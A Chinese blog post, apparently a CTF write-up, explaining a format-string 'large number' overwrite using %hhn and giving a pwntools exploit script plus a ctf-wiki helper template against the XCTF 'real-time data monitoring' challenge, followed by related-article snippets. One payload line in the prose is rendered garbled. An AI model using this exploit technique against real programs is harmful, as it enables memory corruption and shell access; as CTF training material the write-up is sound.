格式化字符串漏洞之大数溢出(攻防世界实时数据检测write_up)

最新推荐文章于 2022-06-22 16:25:32 发布
最新推荐文章于 2022-06-22 16:25:32 发布
阅读量695 收藏
点赞数
分类专栏: 攻防世界 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35066257/article/details/105510661
版权

大数溢出:

就是当你发现了格式化字符串漏洞时,想要向目标地址
写入较大的数,这样使用"%index$n"就没办法达成目标,这样就需要另外两个格式化字符。
在这里插入图片描述

下面以XCTF的实时数据检测为例子:

第一步用checksec查看保护,和位数:

在这里插入图片描述

第二步用ida查看漏洞:

进入imagemagic函数看看
在这里插入图片描述发现存在格式化字符串漏洞,并且当key的值为“35795746”时渗透成功
查看key地址,由于我们需要设置key的值为35795746,因此我们采用大数覆盖的方式,由于x64,x86存储数据时使用的是小端法,所以示意图如下:
在这里插入图片描述

  • 我们通过$hhn向(0x0804A048+i,i=0-3)地址写入单字节的数据
    确定偏移
    在这里插入图片描述
    可以算出格式化字符串在栈中的距离为12
  • 所以我们的payload可以确定为:
    payload=p32(0x0804A048)+p32(0x0804A049)+p32(0x0804A04a)+p32(0x0804A04b)+pad1+’%12 h h n ′ + p a d 2 + ′ hhn'+pad2+'%13 hhn+pad2+hhn’+pad3+’%14$hhn’+pad4+’%15 $hhn’

exp:


from pwn import *

#sh =process("./data_monitoring")

sh =remote("159.138.137.79",50588)
key = 0x0804A048

def
fmt(prev,word,index):
    if prev < word:
        result = word - prev
        fmtstr = '%' + str(result) + 'c'
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        #256的二进制数为1 0000 0000,由于只接受一个字节的内容,所以256 + word - prev 即为要覆盖的数
        fmtstr = '%' + str(result) + 'c'
    fmtstr += '%' + str(index) + '$hhn'
    return fmtstr

def
fmt_str(offset,size,addr,target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev,(target >> i *8) & 0xff,offset + i)
        #((target >> i * 8) &0xff)为每次取16进制数中最低2位的数,之后在右移2位
        prev = (target >> i * 8) &0xff

    return payload

payload =fmt_str(12,4,key,0x2223322)

sh.sendline(payload)
sh.interactive()

这里推荐了,ctf-wiki中的代码模板:


def fmt(prev, word, index):
    if prev < word:
        result = word - prev
        fmtstr = "%" + str(result) + "c"
    elif prev == word:
        result = 0
    else:
        result = 256 + word - prev
        fmtstr = "%" + str(result) + "c"
    fmtstr += "%" + str(index) + "$hhn"
    return fmtstr

def fmt_str(offset, size, addr, target):
    payload = ""
    for i in range(4):
        if size == 4:
            payload += p32(addr + i)
        else:
            payload += p64(addr + i)
    prev = len(payload)
    for i in range(4):
        payload += fmt(prev, (target >> i * 8) & 0xff, offset + i)
        prev = (target >> i * 8) & 0xff
    return payload

参考:
CTF-WIKI 格式化字符串漏洞利用

追知
关注
专栏目录
格式化字符串溢出实验
ChuMeng1999的博客
01-12 877
目录实验目的预备知识什么是格式化字符串格式化字符串如果参数数量不匹配会发生什么?访问任意位置内存在内存中写一个数字实验环境实验内容和步骤找出secret[0]的值修改secret[0]的值修改secret[0]为期望值 实验目的 格式化字符串漏洞是一个很古老的漏洞了,现在几乎已经见不到这类漏洞的身影,但是作为漏洞分析的初学者来说,还是很有必要研究一下的,因为这是基础啊!!!所以就有了这个实验了。我实验环境都搭好了,就差你来跟我搞二进制了!%>.<% 格式化字符串漏洞是由像printf(us
格式化字符串漏洞
ylcangel的专栏
10-30 2915
格式化字符串漏洞 github地址:https://github.com/ylcangel/exploits/tree/master/fmtstr 你可以用于学习,但不能用于商用(如出书、以盈利为目的的课程、文章等),转载需标明出处。 测试平台 系统:CentOS release 6.10 (Final)、32 位 内核版本:Linux 2.6.32-754.10.1.el6.i686...
攻防世界-pwn-实时数据监测
xxxsdd的博客
02-22 1126
1.ida查看代码 2.查看保护机制 什么都没有开 3.知识点 格式化字符串漏洞 例子 printf("aa%16$n") 32位程序时 会向地址为esp+15中的地址addr所指向的内存单元写入2 因为aa表示了两个字节所以向[addr]中 写入2 若想写入15 则可以利用 printf("a*15%16$n") or printf("15x%16$n") 来向地址为esp+15中的地...
[攻防世界 pwn]——实时数据监测
Y_peak的博客
02-27 650
[攻防世界 pwn]——实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746,就好 写个小脚本在pwndbg中看看偏移 from pwn import * p = process('./pwn') gdb.attach(p, 'b *0x080484A7') #p = remote("111.200.241.244",48715) key_addr = 0x0804A048 p
格式化字符串溢出
热门推荐
每昔的博客
07-29 1万+
漏洞原理:        printf是c语言中少有的支持可变参数的库函数。对于可变参数的函数。函数的调用者可以自由的指定函数参数的数量和类型,被调用者无法知道在函数调用之前到底有多少参数被压入帧当中。        格式化字符串漏洞的产生根源主要源于对用户输入未进行过滤,这些输入数据都作为数据传递给某些执行格式化操作的函数,如printf,sprintf,vprintf,vprintf。恶...
攻防世界高手进阶区 ——实时数据检测
weixin_62675330的博客
02-13 1229
攻防世界高手进阶区 ——实时数据检测 1.分析文件 先checksec一下 发现啥都没有开,完全就是裸奔。 运行一下[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 运行发现就是想要把key的值改为0x2223322。 直接上ida int locker() { char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s);
[ 信息系统安全实验1 ] 软件安全:格式化字符串漏洞实验
Formy7的博客
05-27 3229
华科信息系统安全实验1 格式化字符串漏洞实验
格式化字符串漏洞利用
qq_42192672的博客
10-25 3859
学习资料: https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/                        https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E...
[SEEDLab]格式化字符串攻击(format string vulnerability)
HananoYousei的博客
06-09 5808
[SEEDLab]格式化字符串漏洞(Format String Vulnerability) 实验PDF链接 Introduction 格式化字符串漏洞是一个经典的漏洞,也是Pwn里面一个基础吧。他是由于C语言中的printf相关的函数导致的。printf相比大家都已熟悉,对于下面这个语句: printf("%d%d%d", a, b, c); 系统会将"%d%d%d"和后面的a, b, c三个...
c语言格式化输入输出字符串,C语言格式化输入输出函数详解
weixin_36081677的博客
05-17 3653
一:格式输出函数printf()1、调用形式一般为:printf("格式化控制字符串",输出表列);2、格式化控制字符串用于指定输出格式,它有三种形式:1、格式说明符:规定了相应输出表列内容的输出格式,以%打头,如%d、%o等2、转义字符:用来输出转义字符所代表的控制代码或者特殊字符,比如常用的‘\n'、‘\t'3、普通字符:需要原样输出的字符。3、输出表列为若干需要输出的数据项,它与格式说明符在...
Windows 平台下的堆溢出格式化字符串漏洞利用技术
04-09
Windows 平台下的堆溢出格式化字符串漏洞利用技术
漏洞学习笔记——格式化字符串溢出
谈成(C/C++)
04-30 927
格式化字符串溢出指的是调用类似sprintf函数时,没有限定长度而产生溢出。printf中的%s是直接在后面的参数中搜索字符串的,直到遇到’\0’。以下代码就可以产生简单的格式化溢出效果。 #include "stdafx.h" #include <stdlib.h> #include <windows.h> #pragma runtime_checks( "[runtime_checks]", off) void Overflow(char* pData, unsigned
[攻防世界]实时数据监测
逆向萌新的博客
06-22 291
[攻防世界]实时数据监测
攻防世界 pwn--实时数据检测
YANG12345_6的博客
11-30 317
32位程序 保护都没有开 直接拖进ida分析 int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); // 含printf函数,有格式化字符串漏洞 if ( key == 0x2223322 ) // key在bs
攻防世界 Pwn 实时数据监测
MrTreebook的博客
12-12 604
攻防世界 Pwn 实时数据监测1.题目下载地址2.checksec3.IDA4.格式化字符串漏洞的解法5.exp 1.题目下载地址 点击下载 2.checksec 什么保护都没开,估计是很简单的题 进IDA分析一下 3.IDA int locker() { int result; // eax char s[520]; // [esp+0h] [ebp-208h] BYREF fgets(s, 512, stdin); imagemagic(s); if ( key == 35795
攻防世界-进阶区-实时数据监测
CHAWUCIREN1的博客
12-01 2951
将35795746换成十六进制0x2223322(按H) 根据函数,只需要令key等于0x2223322即可getshell 查看一下 imagemagic()函数 存在格式化字符串漏洞 具体看wiki:https://ctf-wiki.org/pwn/linux/user-mode/fmtstr/fmtstr-intro/ 了解到一个骚操作 fmtstr_payload(offset, writes, numbwritten=0, write_size='byte') 第一个参数表示格式化字符串...
攻防世界:PWN刷题-实时数据监测
m0_53932372的博客
12-30 1486
实时数据监测 思路:程序是裸奔的。 漏洞是格式字符串,利用这个漏洞修改key的值,就可以了。 学会的新知识:本来想大数字覆盖一个一个来,但其实pwntools的fmtstr_payload模块就可以了。 fmtstr_payload(offset,{address:value}) exp: #!/usr/bin/python from pwn import * fmt_addr=0x0804A048 p = remote("111.200.241.244",49656) payload=fmtstr_pa
【原理】浅析格式化漏洞
FreeXploiT
03-30 2109
浅析格式化漏洞创建时间:2001-03-03文章属性:转载文章来源:作者:isno (isno@sina.com)文章提交:xundi (xundi_at_xfocus.org)浅析格式化漏洞                       作者:isno (isno@sina.com)                -----------------目录-------------------  
攻防世界xctf-实时数据监测 wp
Casuall的博客
08-14 1321
本题是一个简单的格式化字符串漏洞的利用。先查看一些文件的信息,32位的程序,保护措施没有开。 用IDA查看一些伪代码,发现main函数里面只有一个locker函数,locker函数首先接受了一个字符串s,然后调用imagemagic函数,这个函数跟进去查看其实就是一个printf函数,最后比较key的值是不是为0x2223322,如果相等,返回shell,否则打印key的地址和值。 我们在本地运行一下看看,由于直接把key的地址告诉你了,所以本题的思路是找到格式化字符串地址的偏移,然后覆盖key的值。格
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值